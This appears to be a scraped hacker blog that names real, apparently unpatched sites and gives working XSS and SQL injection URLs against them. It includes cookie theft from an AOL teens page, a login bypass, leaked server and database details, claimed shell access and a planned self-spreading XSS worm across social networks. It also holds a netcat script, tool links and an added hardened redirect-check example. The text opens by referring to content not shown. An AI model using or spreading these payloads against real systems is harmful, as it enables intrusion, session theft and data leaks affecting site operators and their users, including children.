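The redirect above gets through because the filter evidently only checks that an allowed address appears somewhere in sExtURL: "http://www.google.com/https://servizi.inps.it/..." satisfies a substring test while actually sending the browser to google.com. The following is an added example, not code from the original post or from INPS: the weak substring check beside a check that parses the URL and compares the real host against an allowlist (the ALLOWED_HOSTS values are assumed for illustration).

```python
from urllib.parse import urlsplit

# Hosts a redirect is allowed to target (assumed for illustration).
ALLOWED_HOSTS = {"servizi.inps.it", "www.inps.it"}


def is_allowed_substring(url: str) -> bool:
    """The weak check: passes as long as an allowed host appears anywhere in
    the string, which is exactly what the bypass above exploits."""
    return any(host in url for host in ALLOWED_HOSTS)


def is_allowed_parsed(url: str) -> bool:
    """The hardened check: parse the URL and compare the actual host."""
    # Site-relative paths are fine, but "//host" and "/\host" are treated as
    # protocol-relative URLs by browsers and must be rejected.
    if url.startswith("/"):
        return not url.startswith(("//", "/\\"))
    try:
        parts = urlsplit(url)
    except ValueError:  # e.g. malformed IPv6 brackets
        return False
    # Only web schemes; this also rejects javascript: and data: targets.
    if parts.scheme.lower() not in ("http", "https"):
        return False
    # .hostname is lower-cased and has userinfo ("user@") and the port stripped,
    # so "https://servizi.inps.it@evil.example/" resolves to evil.example.
    return parts.hostname is not None and parts.hostname in ALLOWED_HOSTS


if __name__ == "__main__":
    bypass = "http://www.google.com/https://servizi.inps.it/servizi/PinOnLine/Internet/"
    print("substring check:", is_allowed_substring(bypass))  # True: bypassed
    print("parsed check:   ", is_allowed_parsed(bypass))     # False: blocked
```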


-errors ???????-
http://www.inps.it/newportal/default.aspx?sID=
http://www.inps.it/newportal/image.aspx?ImgID=
http://www.inps.it/bussola/GetPDFVersion.aspx?iIDItem=

policlinico umberto 1 - xss - sql injections

a few xss
a possible sql injection (Oracle DBMS) in
http://www.policlinicoumberto1.it/PR_Item.asp

Municipio Roma 7 - XSS - SQL Injections - Possible System Compromise

simple sql inj to login in the admin area ( u: anything p: 'or' )
http://www.municipioroma7.it/damailinglist/admin_cp.asp


sql injection in Title
http://www.municipioroma7.it/?Page=News&Title=




Several other problems.

Comune roma - xss - possible spam and phishing

http://www.comune.roma.it/was/wps/portal/!ut/p/_s.7_0_A/7_0_6L3/.cmd/ad/.ar/sa.spf_ActionListener/.c/6_0_43I/.ce/7_0_SGH/.p/5_0_QUH?annoPubblicazione=&giornoScadenza=&method=searchValue&d-16544-p=3&testoLibero=&spf_strutsAction=%212fhomeAlbp.do<img src="http://www.google.it/images/nav_logo8.png">&giornoPubblicazione=&annoScadenza=&meseScadenza=&provvedimento=-1&mesePubblicazione=&isDisplayTagCall=true&proponente=-1&isDisplayTagCall=true

http://www.comunebn.it Comune Benevento | XSS - sql injection - outdated webserver - possible root compromise

#cat /proc/version
Linux version 2.6.15-1.2054_FC5smp (bhcompile@hs20-bc1-3.build.redhat.com)
(gcc version 4.1.0 20060304 (Red Hat 4.1.0-3)) #1 SMP Tue Mar 14 16:05:46 EST 2006


mysql user (from scripts): cvbIJC_

webroot path: /root/comune.bn/


No further info




XSS
http://www.comunebn.it/webcam_day/foto.php?ore=0%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E0
 

Steal the aol-cookies from the kids

An old xss.....


http://teens.aol.com/entertainment/celebrity-causes?photo=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

Unisannio - XSS and SQL Injections, leak of data, system compromise

There are several other bugs and it's always the same code.
A few samples.

http://www.unisannio.it/notizie/comunicati/viscom.php?id=%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.unisannio.it/notizie/semconv/viscom.php?id=%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.unisannio.it/notizie/seminari/viscom.php?id=

http://ing.unisannio.it/ects/scheda.php?1 - sql errors

-29/12/2011 Update-
After ten minutes spent on the website for fun I've verified that it's possible to run a shell without a lot of problems; the system can be compromised and it's possible to get full administration privileges. The same goes for a few other boxes in the network ... no one is going to patch those computers even after mailing them about the problem.

My love for the nasa.

Long time ago.... The first time I found an xss on a NASA website I reported it to the webmaster .... it was so strange (for me) because *he* was a woman. She was clueless about what I was talking about (xss/sql injections .... bla bla).
Uh ..... as gossip I can tell you that she was a beautiful woman .... I dug into her photos so I can still remember her.
But hey .... she was married and happy (I suppose) :).


This one is new ... found just for fun right now.
http://robotics.nasa.gov/archive/robot_news.php?year=2005<script>alert(document.cookie);</script>

Those are so old that they don't even work anymore, and some pages no longer exist.

http://photojournal.jpl.nasa.gov/gallery/snt?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/gallery/universe?"><script>alert(123456)</script>
http://robotics.nasa.gov/rcc/redirect.php?url=%22%3E%3Cscript%3Ealert(123456)%3C/script%3E%3C/b
http://images.jsc.nasa.gov/search/search.cgi?textsearch=Go&hitsperpage=5&submit.x=11&submit.y=16&submit=submit&keywords=%3Cscript%3Ealert%28%27NotSec.com%27%29%3C%2Fscript%3E
http://photojournal.jpl.nasa.gov/target/Sun?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/targetFamily/Mars?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/targetFamily/Jupiter?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/targetFamily/Venus?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/targetFamily/Saturn?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/targetFamily/Neptune?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/targetFamily/Pluto?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/target/Other?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/targetFamily/Earth?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/targetFamily/Mercury?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/targetFamily/Uranus?"><script>alert(123456)</script>

XSS SQL Injections Aruba.it dump users data.

Those xss are very old too. There are also several sql injections and the possibility of administering several boxes in a control panel due to a bug (but I cannot and I don't want to add them). Those are *just* xss.


http://www.aruba.it/listino.asp?id=/%22%3E%22%3Cscript%3Ealert(document.cookie);%3C/script%3E

http://rivenditori.aruba.it/riv/start.asp?Msg=%22%3E%3E%3C%3Cscript%3Ealert(document.cookie);%3C/script%3E
http://hosting.aruba.it/domini/nodata.asp?Msg=%22%3E%3E%3C%3Cscript%3Ealert(document.cookie);%3C/script%3E
http://hosting.aruba.it/?lang=%22%3E%3E%3C%3Cscript%3Ealert(document.cookie);%3C/script%3E
http://keyposition.aruba.it/scegli.asp?kvu=%22%3E%3E%3C%3Cscript%3Ealert(document.cookie);%3C/script%3E


Reuters doesn't read my emails

Some time ago (more than 2 years? I cannot remember) I sent an email regarding the xss on their (Reuters) website. As far as I can remember I haven't tested other things, but there are a couple of other small bugs.

http://www.reuters.com/search?blob=%22%3B%3E%3C%2Fnoscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

Eures data open to the world. I'm still waiting for a fix.

There are several XSS, a few CSRF etc. on the EURES website.
A sample
http://ec.europa.eu/eures/main.jsp?acro=faq%22%%3C/script%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C&lang=it&catId=489&parentId=0
Even a kid could identify them.
The cookie EURES_SESSIONID can also be (ab)used for other particular things.
You can also impersonate the administrator (maybe I will add an example once they have solved those issues).

Anyway..... I'm still waiting for their fix for the PDF/DOC generation of the curriculum vitae (about a year has passed since my request for support).
Theoretically it's a good service ..... when it works ..... even if I've never used anything except the curriculum generation.

Ikea Home Planner Portable

"Become your own interior designer with the help of the IKEA Planner Tools. Drag and drop your choice of furniture into the room and fit them to the exact measurements of your home. Rearrange and try different styles until you’re satisfied with the result. View it in 3-D and print with all the measurements, just like an architect. See how much it will cost and get the list of all products."


Ikea Home Planner Portable


The portable version of Microsoft Baseline Security Analyzer 2.1.1

"The Microsoft Baseline Security Analyzer provides a streamlined method to identify missing security updates and common security misconfigurations. MBSA 2.1.1 is a minor upgrade to add support for Windows 7 and Windows Server 2008 R2."




Download Microsoft Baseline Security Analyzer from sharebee (Megaupload, Rapidshare, zshare, etc)

The portable version of Goolag Scanner

"The Goolag Scanner is a tool that has been released by the Cult of the Dead Cow to automate Google hacking using 1,500 predefined search queries."
Goolag Scanner Portable

P.S. I don't use this tool.

Firefox Portable WebTools

A Portable version of Mozilla Firefox with several add-ons that are useful for Web Application Security. The purpose of this package is to have the best available addons to manually test XSS, SQL, siXSS, CSRF, Trace XSS, RFI, LFI, etc.

Firefox Portable WebTools

This is an old patch for the latest version of urchin 5 that is no longer supported.

Fix for Urchin 5.703

This is quite old so I don't know if it covers all the bugs, but for sure most of the xss and apache bugs have been solved.


batch scripting carriage return head request

I've spent a bit of time understanding how to get a carriage return from a batch script. Anyway, this simple batch is useless ... a HEAD HTTP request with netcat.
gethead.bat




@echo OFF
setlocal
REM gethead.bat - send an HTTP HEAD request with netcat and print the response headers.
REM Expects nc.exe under %set_path_root%bin\ (set set_path_root before running).
set "NC=%set_path_root%bin\nc.exe"
if not exist "%NC%" goto :NONETCAT
set "HTTPHOST=%~1"
if "%HTTPHOST%" == "" goto :HELP
set "HTTPPORT=%~2"
if "%HTTPPORT%" == "" set "HTTPPORT=80"
set "HTTPHEADREQ=HEAD / HTTP/1.0"
REM echo writes CRLF line endings on Windows, which is what HTTP wants.
REM The redirection comes first so that "1.0>" is not parsed as a redirect of
REM handle 0 and no trailing space is written after the request line.
>httpreqfiledata.tmp echo %HTTPHEADREQ%
REM Host header so name-based virtual hosts answer for the right site.
>>httpreqfiledata.tmp echo Host: %HTTPHOST%
REM An empty line terminates the header block ("echo(" prints a bare newline).
>>httpreqfiledata.tmp echo(
"%NC%" %HTTPHOST% %HTTPPORT% < httpreqfiledata.tmp
del httpreqfiledata.tmp
goto :END

:NONETCAT
echo please make sure that netcat (nc.exe) is available
goto :END
:HELP
echo ------------------------------
echo usage: gethead hostname [port]
echo ------------------------------
:END
endlocal



Advertising networks for socialnetworks


http://www.mochimedia.com/
http://rockyou.com/
http://www.myofferpal.com/
http://www.tattomedia.com/
http://srpoints.com/

Facebook Development Resources

Thursday, 15 April 2010

list of the social networks

I've put up a list of the most common social networks to implement them in an automatic (theory, not practice) xss-based worm with specific "code" download. (XMLHttpRequests almost never work for this .... with the Java class it works on any platform, but it's suspicious and the users are warned.)
(5 s.n. are working. Spread limit to 10 users per network)

Anyway, this is the list of the social networks, some useful sites and the references.


-------------------------------------------------------------------
-References-
http://en.wikipedia.org/wiki/List_of_social_networking_websites
http://socialnetworklist.com
-------------------------------------------------------------------


-write to several social networks in one time-
http://ping.fm/
http://hellotxt.com/
-------------------------------------------------------------------
-Social Networks-
anobii.com
badoo.com
facebook.com
linkedin.com
mixi.jp
myspace.com
orkut.com
viadeo.com
netlog.com
habbo.com
skyrock.com
jaiku.com
US Intelligence Community A-Space
twitter.com
identi.ca
hi5.com
flickr.com
del.icio.us
koornk.com
peoplesound.com
bebo.com
blip.fm
blip.pl
brightkite.com
buboo.tw
buzzherd.com
digu.com
fanfou.com (bugged - actually dead)
fazkut.com
feecle.jp (always down from europe)
frazr.com
friendfeed.com
friendster.com
gozub.com
hictu.com
jisko.net
jiwai.de
khaces.com
kwippy.com
laconi.ca
meemi.com
mexicodiario.com
multiply.com
ning.com
numpa.com
wiserearth.org
plaxo.com
plerb.com
plurk.com
posterous.com
seesmic.com
shoutem.com
socialmedian.com
tuenti.com
tumblr.com
12seconds.com
utterli.com
yammer.com
yelp.com
youare.com
xt3.com
zuosa.com
diigo.com
zoo.gr


-------------------------------------------------------------------

Sunday, 4 April 2010

Online antivirus check tools list

This is a list of online Virus, Malware, Trojan Scanners for Trojans, Backdoors, Worms, Dialers, Spyware/Adware, Keyloggers, Rootkits, Hacking Tools, Riskware, TrackingCookies, Virii, Viruti, Virus, Sniffers, Trojan/Droppers, Troj/Crypt.




Scan uploaded files individually using multiple anti-virus engines
All antivirus software: AhnLab (V3), Aladdin (eSafe), ALWIL (Avast! Antivirus), Authentium (Command Antivirus), Avira (AntiVir), Bit9 (FileAdvisor), Cat Computer Services (Quick Heal), ClamAV (ClamAV), CA Inc. (Vet), Doctor Web, Ltd. (DrWeb), Eset Software (NOD32), ewido networks (ewido anti-malware), Fortinet (Fortinet), FRISK Software (F-Prot), F-Secure (F-Secure), Grisoft (AVG), Hacksoft (The Hacker), Ikarus Software (Ikarus), Kaspersky Lab (AVP), McAfee (VirusScan), Microsoft (Malware Protection), Norman (Norman Antivirus), Panda Software (Panda Platinum), Prevx (Prevx1), Secure Computing (Webwasher), Softwin (BitDefender), Sophos (SAV), Sunbelt Software (Antivirus), Symantec (Norton Antivirus), UNA Corp/Antidote (UNA), VirusBlokAda (VBA32) and VirusBuster (VirusBuster)


http://virusscan.jotti.org/
http://www.virustotal.com/
http://virscan.org/
http://www.viruschief.com/
http://www.filterbit.com/
http://scanner.virus.org/

http://scanner.novirusthanks.org/
----------------------------------------
Single file scanners (single engine?)
Dr.Web
http://online.drweb.com/?url=1 
Avast Online Scanner 
http://onlinescan.avast.com 
Kaspersky Virus File Scanner
http://www.kaspersky.com/scanforvirus
Fortinet FortiGuard Online Virus Scanner 
http://www.fortiguardcenter.com/antivirus/virus_scanner.html
ThreatExpert Free Online File Scanner
http://www.threatexpert.com/filescan.aspx 
Surfright Online malware analysis 
https://www.webimmune.net/default.asp
Norman Sandbox Information Center Analysis 
http://www.norman.com/microsites/nsic/Submit/en
Anubis: Analyzing Unknown Binaries
http://anubis.iseclab.org/index.php 

JoeBox 
http://www.joebox.org/submit.php 

Microsoft Malware Protection Center
https://www.microsoft.com/security/portal/submit.aspx
Sunbelt Malware Sandbox
http://research.sunbelt-software.com/Submit.aspx
ClamAV Online Specimen Scanner 
http://www.gietl.com/test-clamav/ 
----------------------------------------


Online real-time antivirus (single engine)
Kaspersky Online Virus Scanner 
http://www.kaspersky.com/virusscanner
Panda ActiveScan
http://www.pandasecurity.com/activescan/index/ 

CA eTrust Virus Scanner 
http://www.ca.com/us/securityadvisor/virusinfo/scan.aspx 

Virus Chaser for Web 
http://www.viruschaser.com/enwi/4_01.jsp 

BitDefender Online Scanner 
http://www.bitdefender.com/scan8/ie.html
Trend Micro HouseCall 
http://housecall.trendmicro.com/ 

ESET Online Scanner 
http://www.eset.com/onlinescan/ 

Symantec Security Check
http://security.symantec.com/sscv6/home.asp?langid=ie&venid=sym&plfid=24&pkj=RHLFXZDNNXGEQGGYYFK
Ewido (AVG) Online Spyware Scanner
http://www.ewido.net/en/onlinescan/
A-squared Web Malware Scanner
http://www.emsisoft.com/en/software/ax/?scan=1

ArcaBit Online Scanner 
http://arcaonline.arcabit.com/scanner.html 

McAfee FreeScan 
http://us.mcafee.com/root/mfs/scan.asp?affid=56
F-Secure Online Scanner 
http://support.f-secure.com/enu/home/ols.shtml
Windows Live OneCare Safety Scanner 
http://onecare.live.com/site/en-us/default.htm
AhnLab MyV3 Online Anti-Virus Scanner 
http://global.ahnlab.com/global/products/myv3.html
Ahnlab MyV3 Real-Time Scan 
http://global.ahnlab.com/global/products/myv3_rts.html
Ahnlab MySpyZero 
http://global.ahnlab.com/global/products/myspyzero.html
Athentium Command on Demand 
http://www.commandondemand.com/eval/cod/codie.htm  

Hauri LiveCall 
http://www2.globalhauri.com/html/onlineservice/livecall_service.html
PC Pitstop Virus Scanner
http://www.pcpitstop.com/antivirus/AVLoad.asp
Avert Labs WebImmune (registration with scan results in email) 
http://analyzer.surfright.nl/analyzer/ 
